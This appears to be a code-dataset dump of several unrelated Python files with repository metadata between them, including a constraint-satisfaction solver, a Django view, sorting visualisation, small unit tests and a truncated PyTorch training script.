return count(conflict(v) for v in self.neighbors[var])
def display(self, assignment):
print(assignment)
def actions(self, state):
if len(state) == len(self.variables):
return []
else:
assignment = dict(state)
var = first([v for v in self.variables if v not in assignment])
return [(var, val) for val in self.domains[var]
if self.nconflicts(var, val, assignment) == 0]
def result(self, state, action):
(var, val) = action
return state + ((var, val),)
def goal_test(self, state):
assignment = dict(state)
return (len(assignment) == len(self.variables)
and all(self.nconflicts(variables, assignment[variables], assignment) == 0
for variables in self.variables))
def support_pruning(self):
if self.curr_domains is None:
self.curr_domains = {v: list(self.domains[v]) for v in self.variables}
def suppose(self, var, value):
self.support_pruning()
removals = [(var, a) for a in self.curr_domains[var] if a != value]
self.curr_domains[var] = [value]
return removals
def prune(self, var, value, removals):
self.curr_domains[var].remove(value)
if removals is not None:
removals.append((var, value))
def choices(self, var):
return (self.curr_domains or self.domains)[var]
def infer_assignment(self):
self.support_pruning()
return {v: self.curr_domains[v][0]
for v in self.variables if 1 == len(self.curr_domains[v])}
def restore(self, removals):
for B, b in removals:
self.curr_domains[B].append(b)
def conflicted_vars(self, current):
return [var for var in self.variables
if self.nconflicts(var, current[var], current) > 0]
def no_arc_heuristic(csp, queue):
return queue
def AC3(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised, checks = revise(csp, Xi, Xj, removals, checks)
if revised:
if not csp.curr_domains[Xi]:
cDict[Xi][Xj][2]+=1
cDict[Xj][Xi][2]+=1
return False, checks
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
return True, checks
def revise(csp, Xi, Xj, removals, checks=0):
revised = False
for x in csp.curr_domains[Xi][:]:
conflict = True
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
conflict = False
checks += 1
if not conflict:
break
if conflict:
csp.prune(Xi, x, removals)
revised = True
return revised, checks
def AC3b(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
Si_p, Sj_p, Sj_u, checks = partition(csp, Xi, Xj, checks)
if not Si_p:
return False, checks
revised = False
for x in set(csp.curr_domains[Xi]) - Si_p:
csp.prune(Xi, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
if (Xj, Xi) in queue:
if isinstance(queue, set):
queue.difference_update({(Xj, Xi)})
else:
queue.difference_update((Xj, Xi))
for vj_p in Sj_u:
for vi_p in Si_p:
conflict = True
if csp.constraints(Xj, vj_p, Xi, vi_p):
conflict = False
Sj_p.add(vj_p)
checks += 1
if not conflict:
break
revised = False
for x in set(csp.curr_domains[Xj]) - Sj_p:
csp.prune(Xj, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xj]:
if Xk != Xi:
queue.add((Xk, Xj))
return True, checks
def partition(csp, Xi, Xj, checks=0):
Si_p = set()
Sj_p = set()
Sj_u = set(csp.curr_domains[Xj])
for vi_u in csp.curr_domains[Xi]:
conflict = True
for vj_u in Sj_u - Sj_p:
if csp.constraints(Xi, vi_u, Xj, vj_u):
conflict = False
Si_p.add(vi_u)
Sj_p.add(vj_u)
checks += 1
if not conflict:
break
if conflict:
for vj_p in Sj_p:
if csp.constraints(Xi, vi_u, Xj, vj_p):
conflict = False
Si_p.add(vi_u)
checks += 1
if not conflict:
break
return Si_p, Sj_p, Sj_u - Sj_p, checks
def AC4(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
support_counter = Counter()
variable_value_pairs_supported = defaultdict(set)
unsupported_variable_value_pairs = []
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised = False
for x in csp.curr_domains[Xi][:]:
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
support_counter[(Xi, x, Xj)] += 1
variable_value_pairs_supported[(Xj, y)].add((Xi, x))
checks += 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks
while unsupported_variable_value_pairs:
Xj, y = unsupported_variable_value_pairs.pop()
for Xi, x in variable_value_pairs_supported[(Xj, y)]:
revised = False
if x in csp.curr_domains[Xi][:]:
support_counter[(Xi, x, Xj)] -= 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks
return True, checks
def first_unassigned_variable(assignment, csp):
return first([var for var in csp.variables if var not in assignment])
def mrv(assignment, csp):
return argmin_random_tie([v for v in csp.variables if v not in assignment],
key=lambda var: num_legal_values(csp, var, assignment))
def num_legal_values(csp, var, assignment):
if csp.curr_domains:
return len(csp.curr_domains[var])
else:
return count(csp.nconflicts(var, val, assignment) == 0 for val in csp.domains[var])
def domwdeg(assignment, csp):
csp.support_pruning()
fddg = 100
for var in csp.variables:
if var not in assignment:
dom = len(csp.curr_domains[var])
wdeg = 0
for nei in neighbors[var]:
wdeg+=cDict[var][nei][2]
ddg = dom / wdeg
if fddg > ddg:
fddg = ddg
fvar = var
return fvar
def unordered_domain_values(var, assignment, csp):
return csp.choices(var)
def lcv(var, assignment, csp):
return sorted(csp.choices(var), key=lambda val: csp.nconflicts(var, val, assignment))
def no_inference(csp, var, value, assignment, removals):
return True
def forward_checking(csp, var, value, assignment, removals):
csp.support_pruning()
for B in csp.neighbors[var]:
if B not in assignment:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
cDict[var][B][2]+=1
cDict[B][var][2]+=1
return False
return True
def mac(csp, var, value, assignment, removals, constraint_propagation=AC3):
return constraint_propagation(csp, {(X, var) for X in csp.neighbors[var]}, removals)
def backtracking_search(csp, select_unassigned_variable=first_unassigned_variable,
order_domain_values=unordered_domain_values, inference=no_inference):
def backtrack(assignment):
global start_time
if time.time()-start_time>3000:
return None
backtracking_search.num +=1
if len(assignment) == len(csp.variables):
return assignment
var = select_unassigned_variable(assignment, csp)
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
backtracking_search.num = 0
def min_conflicts(csp, max_steps=50):
csp.current = current = {}
for var in csp.variables:
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
for _ in range(max_steps):
conflicted = csp.conflicted_vars(current)
if not conflicted:
return current
var = random.choice(conflicted)
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
return None
min_conflicts.num = 0
def min_conflicts_value(csp, var, current):
min_conflicts_value.num +=1
return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))
min_conflicts_value.num = 0
neighdict={}
for i in variables:
neighdict[i]=set()
def FC(csp, var, value, assignment, removals):
csp.support_pruning()
for B in csp.neighbors[var]:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
if B in assignment:
neighdict[var].add(B)
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
if var<B:
cDict[var][B][2]+=1
else:
cDict[B][var][2]+=1
return False
return True
def fc_cbj(csp, select_unassigned_variable=domwdeg,
order_domain_values=unordered_domain_values, inference=FC):
def backtrack(assignment,myvar=None):
fc_cbj.num+=1
if len(assignment) == len(csp.variables):
return assignment
if myvar==None:
var = select_unassigned_variable(assignment, csp)
else:
var=myvar
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
if neighdict[var]:
proo=max(neighdict[var])
neighdict[var].remove(proo)
neighdict[proo].update(neighdict[var])
neighdict[var].clear()
backtrack(assignment,proo)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
fc_cbj.num =0
mycsp = CSP(variables,domains,neighbors,constraints)
global start_time
print("\n\nRunning with: forward_checking\n")
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,forward_checking):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: MAC\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,mac):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: min_conflict\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if min_conflicts(mycsp):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",min_conflicts_value.num)
print("\n\nRunning with: FC-CBJ\n")
start_time = time.time()
constraints.num=0
if fc_cbj(mycsp,domwdeg,unordered_domain_values,FC):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",fc_cbj.num)
| true
| true
|
1c4466253e969a18fb0c6d7010f4d599e9cba409
| 598
|
py
|
Python
|
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
from random import randint
class Pessoa:
ano_atual = 2021
def __init__(self, nome,idade):
self.nome = nome
self.idade = idade
def get_ano_nascimento(self):
print(self.ano_atual - self.idade)
@classmethod
def por_ano_nascimento(cls, nome, ano_nascimento):
idade = cls.ano_atual - ano_nascimento
return cls(nome, idade)
@staticmethod
def gerar_id():
rand = randint(10000, 19999)
return rand
p1 = Pessoa.por_ano_nascimento('João', 2005)
print(p1.idade)
p1.get_ano_nascimento()
print(p1.gerar_id())
| 26
| 54
| 0.645485
|
from random import randint
class Pessoa:
ano_atual = 2021
def __init__(self, nome,idade):
self.nome = nome
self.idade = idade
def get_ano_nascimento(self):
print(self.ano_atual - self.idade)
@classmethod
def por_ano_nascimento(cls, nome, ano_nascimento):
idade = cls.ano_atual - ano_nascimento
return cls(nome, idade)
@staticmethod
def gerar_id():
rand = randint(10000, 19999)
return rand
p1 = Pessoa.por_ano_nascimento('João', 2005)
print(p1.idade)
p1.get_ano_nascimento()
print(p1.gerar_id())
| true
| true
|
1c4466dc29d29af161d0a6e91e4f0ea8538ec7f8
| 649
|
py
|
Python
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 4,461
|
2019-01-13T02:06:25.000Z
|
2022-03-31T11:50:11.000Z
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 66
|
2019-01-17T10:36:21.000Z
|
2022-02-22T21:29:30.000Z
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 1,051
|
2019-01-13T17:30:49.000Z
|
2022-03-31T03:33:00.000Z
|
from utilities.data_structures.Deque import Deque
from utilities.data_structures.Node import Node
def test_Deque_initialisation():
deque = Deque(2, 1)
assert all(deque.deque == [Node(0, (None,)), Node(0, (None,))])
def test_Deque_adding_elements():
deque = Deque(2, 1)
deque.add_element_to_deque(3, 5)
deque.add_element_to_deque(2, 4)
assert all(deque.deque == [Node(3, 5), Node(2, 4)])
deque.add_element_to_deque(1, 2)
assert all(deque.deque == [Node(1, 2), Node(2, 4)])
deque.add_element_to_deque(-100, 0)
deque.add_element_to_deque(0, 0)
assert all(deque.deque == [Node(0, 0), Node(-100, 0)])
| 25.96
| 67
| 0.671803
|
from utilities.data_structures.Deque import Deque
from utilities.data_structures.Node import Node
def test_Deque_initialisation():
deque = Deque(2, 1)
assert all(deque.deque == [Node(0, (None,)), Node(0, (None,))])
def test_Deque_adding_elements():
deque = Deque(2, 1)
deque.add_element_to_deque(3, 5)
deque.add_element_to_deque(2, 4)
assert all(deque.deque == [Node(3, 5), Node(2, 4)])
deque.add_element_to_deque(1, 2)
assert all(deque.deque == [Node(1, 2), Node(2, 4)])
deque.add_element_to_deque(-100, 0)
deque.add_element_to_deque(0, 0)
assert all(deque.deque == [Node(0, 0), Node(-100, 0)])
| true
| true
|
1c4467414998af56816a2597349b7bc99489b16f
| 899
|
py
|
Python
|
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | null | null | null |
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | 23
|
2020-07-17T23:27:44.000Z
|
2022-03-21T19:39:19.000Z
|
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | null | null | null |
"""Tests for the VirtualEnv class."""
from __future__ import annotations
from typing import TYPE_CHECKING
from neophile.virtualenv import VirtualEnv
if TYPE_CHECKING:
from pathlib import Path
def test_provided_env(tmp_path: Path) -> None:
"""Test virtualenv execution with an env parameter."""
venv_path = tmp_path / "venv"
venv = VirtualEnv(venv_path)
result = venv.run(
["/bin/sh", "-c", "echo $FOO"],
capture_output=True,
text=True,
env={"FOO": "testing"},
)
assert result.stdout == "testing\n"
assert (venv_path / "bin" / "activate").exists()
def test_preexisting(tmp_path: Path) -> None:
"""If the directory exists, create should silently do nothing."""
venv_path = tmp_path / "venv"
venv_path.mkdir()
venv = VirtualEnv(venv_path)
venv.create()
assert not (venv_path / "bin" / "activate").exists()
| 26.441176
| 69
| 0.657397
|
from __future__ import annotations
from typing import TYPE_CHECKING
from neophile.virtualenv import VirtualEnv
if TYPE_CHECKING:
from pathlib import Path
def test_provided_env(tmp_path: Path) -> None:
venv_path = tmp_path / "venv"
venv = VirtualEnv(venv_path)
result = venv.run(
["/bin/sh", "-c", "echo $FOO"],
capture_output=True,
text=True,
env={"FOO": "testing"},
)
assert result.stdout == "testing\n"
assert (venv_path / "bin" / "activate").exists()
def test_preexisting(tmp_path: Path) -> None:
venv_path = tmp_path / "venv"
venv_path.mkdir()
venv = VirtualEnv(venv_path)
venv.create()
assert not (venv_path / "bin" / "activate").exists()
| true
| true
|
1c4468ba33418923dca05c70f0096dda2c4a0a8d
| 1,953
|
py
|
Python
|
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | 6
|
2018-12-19T02:33:10.000Z
|
2020-10-31T07:59:37.000Z
|
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | null | null | null |
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 23 13:55:02 2018
@author: zhanghuangzhao
"""
import numpy
import copy
import os, shutil
import imageio
import matplotlib.pyplot as plt
size = 8
arr = None
def SlowSort(a, idx_begin, idx_end, reverse=False):
a = copy.deepcopy(a)
proc = []
if idx_begin >= idx_end:
return a, proc
idx_mid = int(numpy.floor((idx_begin+idx_end)/2))
a, tmp_proc = SlowSort(a, idx_begin, idx_mid, reverse)
proc += tmp_proc
a, tmp_proc = SlowSort(a, idx_mid+1, idx_end, reverse)
proc += tmp_proc
if (reverse and a[idx_mid] > a[idx_end]) \
or ((not reverse) and a[idx_mid] < a[idx_end]):
(a[idx_mid], a[idx_end]) = (a[idx_end], a[idx_mid])
proc.append(copy.deepcopy(a))
a, tmp_proc = SlowSort(a, idx_begin, idx_end-1, reverse)
proc += tmp_proc
return a, proc
if __name__ == "__main__":
arr = numpy.random.uniform(0, 1, size=size)
arr = arr.tolist()
res, proc = SlowSort(arr, 0, len(arr)-1)
tmp_dir = "../images/tmp"
img_buf = []
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
for i in range(len(proc)):
plt.cla()
plt.bar(list(range(len(proc[i]))),
height=proc[i],
width=0.5)
plt.xlim([-1, len(arr)])
plt.ylim([-0.01, 1.01])
plt.savefig(os.path.join(tmp_dir, ("%d.jpg" % i)))
img_buf.append(imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % i))))
print ("\r%d / %d" % (i+1, len(proc)), end="")
print("\ndone!")
plt.cla()
init = [imageio.imread(os.path.join(tmp_dir, "0.jpg")) for i in range(10)]
final = [imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % (len(proc)-1)))) for i in range(10)]
img_buf = init + img_buf + final
shutil.rmtree(tmp_dir)
imageio.mimsave("../images/SlowSort.gif", img_buf)
| 27.125
| 98
| 0.578597
|
import numpy
import copy
import os, shutil
import imageio
import matplotlib.pyplot as plt
size = 8
arr = None
def SlowSort(a, idx_begin, idx_end, reverse=False):
a = copy.deepcopy(a)
proc = []
if idx_begin >= idx_end:
return a, proc
idx_mid = int(numpy.floor((idx_begin+idx_end)/2))
a, tmp_proc = SlowSort(a, idx_begin, idx_mid, reverse)
proc += tmp_proc
a, tmp_proc = SlowSort(a, idx_mid+1, idx_end, reverse)
proc += tmp_proc
if (reverse and a[idx_mid] > a[idx_end]) \
or ((not reverse) and a[idx_mid] < a[idx_end]):
(a[idx_mid], a[idx_end]) = (a[idx_end], a[idx_mid])
proc.append(copy.deepcopy(a))
a, tmp_proc = SlowSort(a, idx_begin, idx_end-1, reverse)
proc += tmp_proc
return a, proc
if __name__ == "__main__":
arr = numpy.random.uniform(0, 1, size=size)
arr = arr.tolist()
res, proc = SlowSort(arr, 0, len(arr)-1)
tmp_dir = "../images/tmp"
img_buf = []
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
for i in range(len(proc)):
plt.cla()
plt.bar(list(range(len(proc[i]))),
height=proc[i],
width=0.5)
plt.xlim([-1, len(arr)])
plt.ylim([-0.01, 1.01])
plt.savefig(os.path.join(tmp_dir, ("%d.jpg" % i)))
img_buf.append(imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % i))))
print ("\r%d / %d" % (i+1, len(proc)), end="")
print("\ndone!")
plt.cla()
init = [imageio.imread(os.path.join(tmp_dir, "0.jpg")) for i in range(10)]
final = [imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % (len(proc)-1)))) for i in range(10)]
img_buf = init + img_buf + final
shutil.rmtree(tmp_dir)
imageio.mimsave("../images/SlowSort.gif", img_buf)
| true
| true
|
1c44692d32c53253146a108f2c5bcf7a2cb3f282
| 1,112
|
py
|
Python
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | 6
|
2020-07-28T19:58:28.000Z
|
2021-05-01T18:51:37.000Z
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | 81
|
2020-07-30T07:08:10.000Z
|
2021-07-28T02:17:43.000Z
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | null | null | null |
from django.http import JsonResponse
from ..models import Template, Scenario
# NOTE: I think this can be deleted and be replaced by django rest framework
def get_templates_metadata(request):
"""
Get the templates for a project from a lookup on the scenario id. This
is because we only have access to the scenario id param from the sim page.
"""
scenario_id = request.GET.get('scenario_id', None)
if not scenario_id:
return JsonResponse({'error': 'Need to provide scenario_id'})
scenario = Scenario.objects.filter(id=int(scenario_id)).first()
if scenario is None:
return JsonResponse({'error': f'Could not find scenario with id {scenario_id}'})
project = scenario.project
if project is None:
return JsonResponse({'error': 'Project for scenario was none'})
templates = []
show_hidden = int(request.GET.get('show_hidden', 0)) == 1
for template in Template.objects.filter(project=project, is_hidden=show_hidden):
templates.append(dict(name=template.name, id=template.id))
return JsonResponse({'templates': templates})
| 39.714286
| 88
| 0.705935
|
from django.http import JsonResponse
from ..models import Template, Scenario
def get_templates_metadata(request):
scenario_id = request.GET.get('scenario_id', None)
if not scenario_id:
return JsonResponse({'error': 'Need to provide scenario_id'})
scenario = Scenario.objects.filter(id=int(scenario_id)).first()
if scenario is None:
return JsonResponse({'error': f'Could not find scenario with id {scenario_id}'})
project = scenario.project
if project is None:
return JsonResponse({'error': 'Project for scenario was none'})
templates = []
show_hidden = int(request.GET.get('show_hidden', 0)) == 1
for template in Template.objects.filter(project=project, is_hidden=show_hidden):
templates.append(dict(name=template.name, id=template.id))
return JsonResponse({'templates': templates})
| true
| true
|
1c44698c1a36059851b7d59d1a9db5fef3c470ba
| 294
|
py
|
Python
|
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 tianyou pan <sherry0429 at SOAPython>
"""
from tornado_layer import BaseHttpBody
class TestMessageBody(BaseHttpBody):
data = "i am test data"
def __init__(self, url, method):
super(TestMessageBody, self).__init__(url, method)
| 19.6
| 58
| 0.687075
|
from tornado_layer import BaseHttpBody
class TestMessageBody(BaseHttpBody):
data = "i am test data"
def __init__(self, url, method):
super(TestMessageBody, self).__init__(url, method)
| true
| true
|
1c446a89bba32565bdf40122d1a561b1a162328f
| 438
|
py
|
Python
|
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
def to_molsysmt_Trajectory(item, selection='all', frame_indices='all', syntaxis='MolSysMT'):
from molsysmt.tools.mdanalysis_Universe import is_mdanalysis_Universe
from molsysmt.basic import convert
if not is_mdanalysis_Universe(item):
raise ValueError
tmp_item = convert(item, to_form='molsysmt.Trajectory', selection=selection,
frame_indices=frame_indices, syntaxis=syntaxis)
return tmp_item
| 31.285714
| 92
| 0.755708
|
def to_molsysmt_Trajectory(item, selection='all', frame_indices='all', syntaxis='MolSysMT'):
from molsysmt.tools.mdanalysis_Universe import is_mdanalysis_Universe
from molsysmt.basic import convert
if not is_mdanalysis_Universe(item):
raise ValueError
tmp_item = convert(item, to_form='molsysmt.Trajectory', selection=selection,
frame_indices=frame_indices, syntaxis=syntaxis)
return tmp_item
| true
| true
|
1c446b141031895ba08007681fefd9346f8b0dac
| 999
|
py
|
Python
|
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | 1
|
2019-08-26T01:48:02.000Z
|
2019-08-26T01:48:02.000Z
|
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | null | null | null |
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | 1
|
2021-02-12T14:57:41.000Z
|
2021-02-12T14:57:41.000Z
|
"""By: Xiaochi (George) Li: github.com/XC-Li"""
from gensim.models.doc2vec import Doc2Vec
import numpy as np
from scipy.sparse import hstack as sparse_hstack
class D2V(object):
def __init__(self, file):
self.model = Doc2Vec.load(file)
def fit(self, X):
pass
def transform(self, X):
temp = []
for speech in X:
temp.append(self.model.infer_vector(speech))
return np.vstack(temp)
class StackedD2V(object):
def __init__(self, file, vectorizer):
self.d2v = Doc2Vec.load(file)
self.vectorizer = vectorizer
def fit(self, X):
self.vectorizer.fit(X)
def d2v_transform(self, X):
temp = []
for speech in X:
temp.append(self.d2v.infer_vector(speech))
return np.vstack(temp)
def transform(self, X):
bow = self.vectorizer.transform(X)
d2v_emb = self.d2v_transform(X)
combined_emb = sparse_hstack((bow, d2v_emb))
return combined_emb
| 24.975
| 56
| 0.620621
|
from gensim.models.doc2vec import Doc2Vec
import numpy as np
from scipy.sparse import hstack as sparse_hstack
class D2V(object):
def __init__(self, file):
self.model = Doc2Vec.load(file)
def fit(self, X):
pass
def transform(self, X):
temp = []
for speech in X:
temp.append(self.model.infer_vector(speech))
return np.vstack(temp)
class StackedD2V(object):
def __init__(self, file, vectorizer):
self.d2v = Doc2Vec.load(file)
self.vectorizer = vectorizer
def fit(self, X):
self.vectorizer.fit(X)
def d2v_transform(self, X):
temp = []
for speech in X:
temp.append(self.d2v.infer_vector(speech))
return np.vstack(temp)
def transform(self, X):
bow = self.vectorizer.transform(X)
d2v_emb = self.d2v_transform(X)
combined_emb = sparse_hstack((bow, d2v_emb))
return combined_emb
| true
| true
|
1c446ba5c4b308ca1c5d968bc183ff8711ec453b
| 323
|
py
|
Python
|
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | 1
|
2018-01-02T05:47:07.000Z
|
2018-01-02T05:47:07.000Z
|
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from frontend.handlers.result_feedback import ResultFeedback
class FracasResultFeedback(ResultFeedback):
@property
def client(self):
return 'fracas'
| 24.846154
| 72
| 0.780186
|
from frontend.handlers.result_feedback import ResultFeedback
class FracasResultFeedback(ResultFeedback):
@property
def client(self):
return 'fracas'
| true
| true
|
1c446c08fda3e987130a4789309ad6cc490f6da8
| 3,132
|
py
|
Python
|
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
import os
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import (
StandardScaler,
MinMaxScaler,
)
from sklearn.pipeline import Pipeline
from gplearn.genetic import SymbolicTransformer
import pickle
sk_pipeline = Pipeline(
[
('scaler', StandardScaler()),
#('transformer', SymbolicTransformer(n_jobs=-1))
]
)
def correlation(x, y):
return np.corrcoef(x, y)[0, 1]
class LinearNet(nn.Module):
def __init__(self, n_feat, n_out= 1):
super().__init__()
self.conv1 = nn.Conv1d(n_feat, 15, 1)
self.pool1 = nn.MaxPool1d(1)
self.flatten = nn.Flatten()
self.relu1 = nn.ReLU()
self.linear1 = nn.Linear(15, 5)
self.out = nn.Linear(5, n_out)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.flatten(x)
x = self.relu1(x)
x = self.linear1(x)
x = self.out(x)
return x
def train(
model,
X, y,
epochs=50000,
batch_size=None,
learning_rate=1e-5,
score_func=correlation,
optimizer=optim.Adam,
loss_func=nn.MSELoss(),
):
y_comp = y.detach().cpu().numpy().reshape(-1,)
optimizer = optimizer(model.parameters(), lr=learning_rate)
splits = floor(len(X) / batch_size) if batch_size != None else 1
X_batches = torch.tensor_split(X, splits)
y_batches = torch.tensor_split(y, splits)
bar = tqdm(range(epochs))
for epoch in bar:
for x, y in zip(X_batches, y_batches):
y_pred = model(x)
